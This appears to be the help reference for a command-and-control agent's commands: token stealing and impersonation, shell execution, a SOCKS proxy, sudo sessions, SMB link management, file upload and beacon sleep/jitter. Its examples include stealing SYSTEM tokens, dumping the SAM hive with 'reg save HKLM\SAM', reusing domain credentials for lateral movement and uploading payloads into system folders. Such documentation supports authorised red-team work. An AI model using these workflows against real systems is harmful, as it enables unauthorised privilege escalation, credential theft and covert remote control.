Reverts any active token impersonation and returns to the original security context. OVERVIEW: Universal command to revert impersonation from both steal-token and make-token. Cleans up impersonation handles and resets to the process's original token. Safe to call even when not impersonating. USAGE: rev2self # Revert any active impersonation BEHAVIOR: - Calls Windows RevertToSelf API - Cleans up stored impersonation handles - Resets internal impersonation state - Shows before/after user context - Safe to call multiple times WORKS WITH: - steal-token impersonations - make-token impersonations - Any other token manipulations EXAMPLES: After steal-token: steal-token 1752 # Become SYSTEM whoami # Shows SYSTEM rev2self # Revert whoami # Shows original user After make-token: make-token CORP\admin Pass123 # Create token make-token impersonate # Use token whoami # Shows CORP\admin rev2self # Revert whoami # Shows original user Chain operations: steal-token 4532 # Steal user1 # ... operations as user1 ... make-token CORP\svc Pass456 # Create service token make-token impersonate # Use service token # ... operations as service ... rev2self # Back to original

rm file

Win Linux macOS

Remove files and directories from the target system

Syntax

rm <file/directory>...                    # Remove files
rm -r <directory>...                      # Remove directories recursively
rm -f <file/directory>...                 # Force removal, ignore errors
rm -rf <directory>...                     # Force recursive removal
rm --recursive <directory>...             # Long form of -r
rm --force <file/directory>...            # Long form of -f

Examples

rm file.txt rm file1.txt file2.txt file3.txt rm -r /tmp/test_dir rm -rf /var/log/old_logs rm -f nonexistent.txt rm -r dir1 dir2 dir3 rm -rf C:\Temp\* rm --recursive --force /tmp/cache

Details

Removes files and directories from the target system. FLAGS: -r, -R, --recursive Remove directories and their contents recursively -f, --force Ignore nonexistent files, suppress errors -rf, -fr Combine recursive and force (common usage) EXAMPLES BY USE CASE: Remove temporary files: rm /tmp/*.log # Remove all log files rm -f /tmp/cache_* # Force remove cache files Clean up directories: rm -r build/ # Remove build directory rm -rf node_modules/ # Force remove dependencies Batch removal: rm *.bak *.tmp *.log # Remove multiple file types rm -r old_* archive_* # Remove multiple directories Windows examples: rm C:\Users\Public\file.txt # Remove single file rm -r C:\Temp\TestFolder # Remove folder rm -rf C:\Windows\Temp\* # Clean temp (requires admin) Unix/Linux examples: rm /var/log/app.log # Remove log file rm -r ~/.cache/ # Remove cache directory rm -rf /tmp/session-* # Remove session files

shell execution

Win Linux macOS

Execute a shell command on the target system (token-aware on Windows)

Syntax

shell <command> [arguments...]
shell --timeout <seconds> <command> [arguments...]

Examples

shell whoami shell netstat -an shell ps aux shell ipconfig /all shell ls -la /tmp shell --timeout 5 ping google.com shell --timeout 60 ./long-running-script.sh

Details

Executes commands in the target system's shell: - Windows: Uses cmd.exe (token-aware - see below) - Linux/macOS: Uses user's default shell ($SHELL) with fallback to bash, zsh, then sh - Command and all arguments are passed directly to the shell - Output is returned when the command completes - Default timeout is 30 seconds TOKEN-AWARE EXECUTION (Windows): When a token is active (via steal-token or make-token), shell commands automatically: - Execute with the impersonated user's privileges - Use CreateProcessAsUser API for proper token inheritance - Show the active token name in command output - Maintain token context across command execution Example workflow: steal-token 1752 system # Steal SYSTEM token shell whoami # Returns "NT AUTHORITY\SYSTEM" shell reg save HKLM\SAM sam # Works with SYSTEM privileges rev2self # Revert to original token shell whoami # Returns original user Options: --timeout <seconds> Set custom timeout for command execution (default: 30) Examples: shell whoami # Run whoami with default 30s timeout shell --timeout 5 ping 8.8.8.8 # Run ping with 5 second timeout shell --timeout 60 ./script.sh # Run script with 60 second timeout Shell Detection (Unix/Linux/macOS): 1. Uses $SHELL environment variable if set and valid 2. Falls back to /bin/bash if available 3. Falls back to /bin/zsh if available (macOS default) 4. Falls back to /bin/sh as last resort (POSIX standard) Security Notes: - Commands run with agent's privileges (or impersonated token on Windows) - No input sanitization is performed - Use with caution on production systems - Token context is shown in output header on Windows

sleep utility

Win Linux macOS

Change agent check-in interval and jitter

Syntax

sleep <duration> [jitter_percent]

Examples

sleep 30 sleep 1m 15 sleep 1m30s 5 sleep 2h 10 sleep 1h5m 20

Details

Changes the agent polling/sleep interval and jitter: - Duration supports s(seconds), m(minutes), h(hours) - Can combine units: 1m30s, 1h5m, 2h30m - Optional jitter percentage (0-100) - Examples: sleep 30s 5 (30 sec, 5% jitter), sleep 1m30s 15 (90 sec, 15% jitter) - Takes effect on next check-in

socks network

Win Linux macOS

Start/stop SOCKS proxy server

Syntax

socks <start|stop> <socks_port> <path> <wss_port>

Examples

socks start 1080 https://domain.com/some/path 443 socks stop 1080

Details

Starts or stops a SOCKS proxy server: - Requires a valid WebSocket URL - Start requires ports for SOCKS and WSS - Stop requires only the SOCKS port

sudo-session execution

Linux macOS

Manage persistent sudo sessions with optional state tracking for elevated command execution

Syntax

sudo-session start <password> [username]  # Start session as root or specified user
sudo-session exec <command>               # Execute command in active session
sudo-session exec-stateful <command>      # Execute with forced state persistence
sudo-session enable-stateful              # Enable state tracking (cd, env vars persist)
sudo-session disable-stateful             # Disable state tracking (default)
sudo-session status                       # Check session status and mode
sudo-session stop                         # Terminate active session

Examples

sudo-session start mypassword sudo-session start mypassword postgres sudo-session exec whoami sudo-session enable-stateful sudo-session exec cd /tmp sudo-session exec pwd sudo-session exec export FOO=bar sudo-session exec echo $FOO sudo-session exec-stateful ls sudo-session disable-stateful sudo-session status sudo-session stop

Details

Manages an elevated shell session with optional state persistence: EXECUTION MODES: Stateless (Default): Each command runs independently, no state persists Stateful (Optional): Tracks directory changes and environment variables SUBCOMMANDS: start <password> [username] - Start sudo session (default: root) exec <command> - Execute command (uses current mode) exec-stateful <command> - Force stateful execution for one command enable-stateful - Switch to stateful mode disable-stateful - Switch to stateless mode (default) status - Show session info, mode, and tracked state stop - Terminate the session HOW STATEFUL MODE WORKS: - Tracks 'cd' commands and maintains working directory - Tracks 'export' commands and maintains environment variables - Applies tracked state to each command execution - Each command still runs independently (reliable) - State is simulated, not using a persistent shell USER SUPPORT: - Default: 'sudo-session start <password>' switches to root - Specific user: 'sudo-session start <password> <username>' - Examples: postgres, www-data, oracle, nginx, etc. USAGE FLOWS: Stateless (Reliable, Default): sudo-session start mypass sudo-session exec cd /tmp # Doesn't affect next command sudo-session exec pwd # Still in original directory Stateful (State Tracking): sudo-session start mypass sudo-session enable-stateful sudo-session exec cd /tmp # Changes tracked directory sudo-session exec pwd # Shows /tmp sudo-session exec export FOO=bar # Sets tracked env var sudo-session exec echo $FOO # Shows 'bar' # Check current mode and state sudo-session status # Output: Active session for user 'root' (PID: 12345, Mode: stateful (simulated, pwd: /etc/nginx), Uptime: 2m) # Environment variables (stateful only) sudo-session enable-stateful sudo-session exec export DB_HOST=localhost sudo-session exec export DB_PORT=5432 sudo-session exec 'echo Database: $DB_HOST:$DB_PORT' # Shows: Database: localhost:5432 # Clean up sudo-session stop SECURITY NOTES: - Password stored in memory during session - Session remains active until stopped or agent disconnects - Always use 'sudo-session stop' when done - Each agent has independent sessions TECHNICAL DETAILS: - Stateless: Each 'exec' runs 'sudo -S sh -c <command>' independently - Stateful: Tracks state and runs 'cd <dir> && export VAR=val && <command>' - Falls back to stateless if any issues occur - Status shows current mode and tracked directory

token token

Win

Comprehensive token management for impersonation and lateral movement

Syntax

token create <DOMAIN\user> <pass> <name> [type]
token create netonly <DOMAIN\user> <pass> <name>
token steal <pid> [name] [netonly]
token store <pid> <name> [netonly]
token use <name> [netonly]
token impersonate
token netonly [set|clear|status]
token list [processes]
token current
token remove <name>
token clear
token revert

Examples

token create CORP\admin Pass123 admin-tok token create netonly REMOTE\svc SvcPass remote-net token steal 1752 system-tok token store 4568 backup-tok netonly token use admin-tok token netonly set remote-admin token list processes token current token revert

Details

OVERVIEW: Unified token management system for creating, stealing, and managing Windows security tokens. Supports both full impersonation and network-only tokens for flexible privilege escalation. All tokens are stored in a unified repository accessible across operations. CORE CONCEPTS: - Full Impersonation: Changes both local and network identity - Network-Only: Affects only network operations, preserves local identity - Unified Store: All tokens (created or stolen) share the same storage VERBS: ═══ TOKEN CREATION ═══ create <DOMAIN\user> <pass> <n> [type] - Create token via LogonUser: Creates a new token using Windows LogonUser API Default type is 'interactive' if not specified Token is stored but NOT automatically used Example: token create CORP\admin Pass123 admin-tok create netonly <DOMAIN\user> <pass> <n> - Create network-only token: Creates token specifically for network operations Local operations remain unaffected Must activate with 'token netonly set' Example: token create netonly REMOTE\svc SvcPass remote-net ═══ TOKEN STEALING ═══ steal <pid> [name] [netonly] - Steal and impersonate: Duplicates target process token Immediately impersonates (unless netonly) Auto-generates name if not provided Example: token steal 1752 system-tok Example: token steal 1752 net-tok netonly store <pid> <n> [netonly] - Store without using: Duplicates and stores token for later Does NOT impersonate immediately Build a library of tokens Example: token store 4568 backup-tok netonly list processes - Show stealable tokens: Enumerates all accessible process tokens Shows process name, PID, and owner Identifies current process Example: token list processes ═══ TOKEN USAGE ═══ use <n> [netonly] - Activate stored token: Switches to any stored token Works with both created and stolen tokens Optional netonly for network-only activation Example: token use admin-tok Example: token use remote-tok netonly impersonate - Quick impersonation: Uses most recent created token Skips network-only tokens Shortcut for common workflow Example: token impersonate ═══ NETWORK-ONLY MANAGEMENT ═══ netonly set <n> - Set network token: Activates token for network operations only Local identity remains unchanged Can be combined with full impersonation Example: token netonly set remote-admin netonly clear - Clear network token: Removes active network-only token Network ops revert to current identity Does not affect full impersonation Example: token netonly clear netonly status - Show network status: Displays active network-only token Shows tokens marked as network-only Lists current configuration Example: token netonly status ═══ TOKEN INFORMATION ═══ list - Show all stored tokens: Displays complete token inventory Shows user, source, and metadata Indicates active tokens Example: token list stored - Alias for list: Same as 'token list' Shows all tokens in store Example: token stored current - Show token status: Displays current effective identity Shows active impersonation Shows network-only token if set Example: token current status - Alias for current: Same as 'token current' Example: token status ═══ TOKEN CLEANUP ═══ remove <n> - Delete stored token: Removes token from store Cannot remove active tokens Frees associated resources Example: token remove backup-tok clear - Remove all created tokens: Cleans up all LogonUser tokens Does not affect stolen tokens Handles active tokens gracefully Example: token clear revert - Revert all impersonation: Returns to original identity Clears both full and network tokens Same as rev2self command Example: token revert ═════════════════════════════════════════════════ LOGON TYPES FOR CREATE: interactive - Interactive logon (default) network - Network logon (no local access) batch - Batch job logon service - Service account logon network_cleartext - Network with cleartext credentials new_credentials - Clone current with new network creds WORKFLOW EXAMPLES: Basic Token Theft: token list processes # Find target process token steal 1752 system # Steal and impersonate whoami # Verify new identity token revert # Return to original Network-Only Access: token create netonly CORP\admin Pass123 corp-net token netonly set corp-net # Activate for network net use \\dc01\c$ # Uses CORP\admin dir C:\ # Uses original identity token netonly clear # Deactivate Building Token Library: token store 1752 system-tok # Store SYSTEM token token store 2140 admin-tok # Store admin token token create CORP\svc Pass svc-tok # Create service token token list # View all tokens token use admin-tok # Switch as needed Mixed Operations: token steal 1752 local-system # Full impersonation token create netonly REMOTE\admin Pass remote-net token netonly set remote-net # Set network token # Now: Local = SYSTEM, Network = REMOTE\admin

unlink network

Win

Disconnect from a linked SMB agent

Syntax

unlink <agent_id>
unlink all

Examples

unlink abc123 unlink all

Details

Disconnects from a linked SMB agent. USAGE: unlink <agent_id> Disconnect from a specific linked agent unlink all Disconnect from all linked agents When an agent is unlinked: - The SMB pipe connection is closed - The link agent stops receiving commands through this edge agent - The link agent may attempt to reconnect or remain dormant NOTE: This does not kill the remote SMB agent - it only severs the connection. The SMB agent will continue running and can be re-linked later. EXAMPLES: # Unlink a specific agent (use agent ID from tree view) unlink abc123def456 # Unlink all connected SMB agents unlink all

upload file

Win Linux macOS

Upload a file to the target system

Syntax

upload                     # Opens file dialog
upload <local_path>        # Upload to CWD with original filename
upload <local_path> <new_name>        # Upload to CWD with new filename
upload <local_path> <remote_path>     # Upload to specific remote path

Examples

upload # Opens file selection dialog upload /tmp/payload.exe # Uploads as payload.exe in current directory upload /tmp/payload.exe new.exe # Uploads as new.exe in current directory upload /tmp/payload.exe C:\Windows\payload.exe # Uploads to full remote path upload ./script.sh /tmp/script.sh # Uploads to full remote path

Details

Transfers a file to the target system: - No arguments: Opens file selection dialog - One argument: Uploads to current working directory with original filename - Two arguments: * If second starts with / or \: Uses as full remote path * Otherwise: Uses as new filename in current directory - Local path must exist - Remote path must be writable - Progress shown during transfer

whoami info

Win Linux macOS

Display current user information

Syntax

whoami                    # Show current username
whoami -v                 # Show detailed user and system information
whoami -g                 # Show group memberships

Examples

whoami whoami -v whoami -g

Details

Displays information about the current user and system context. MODES: Basic: Shows just the username Verbose: Shows comprehensive user, system, and environment information FLAGS: -v Display detailed information including: - User ID and Group ID - Home directory - Shell -g Display group memberships (group IDs) BASIC OUTPUT: Returns the current username in the format: - Unix/Linux/macOS: username - Windows: DOMAIN\username or COMPUTER\username VERBOSE OUTPUT (-v): - UID: User ID - GID: Group ID - Home: Home directory path - Shell: Default shell (or "unknown" if not available) GROUPS OUTPUT (-g): - Lists all group IDs the user belongs to WINDOWS IMPERSONATION: When using an impersonated token (steal-token, make-token): - Shows the impersonated user's identity - With -v, indicates "(impersonated)" status EXAMPLES: Quick identity check: whoami # Just show who I am Get user details: whoami -v # Show UID, GID, home, shell Check group memberships: whoami -g # List all group IDs Domain information (Windows): whoami # Shows DOMAIN\username format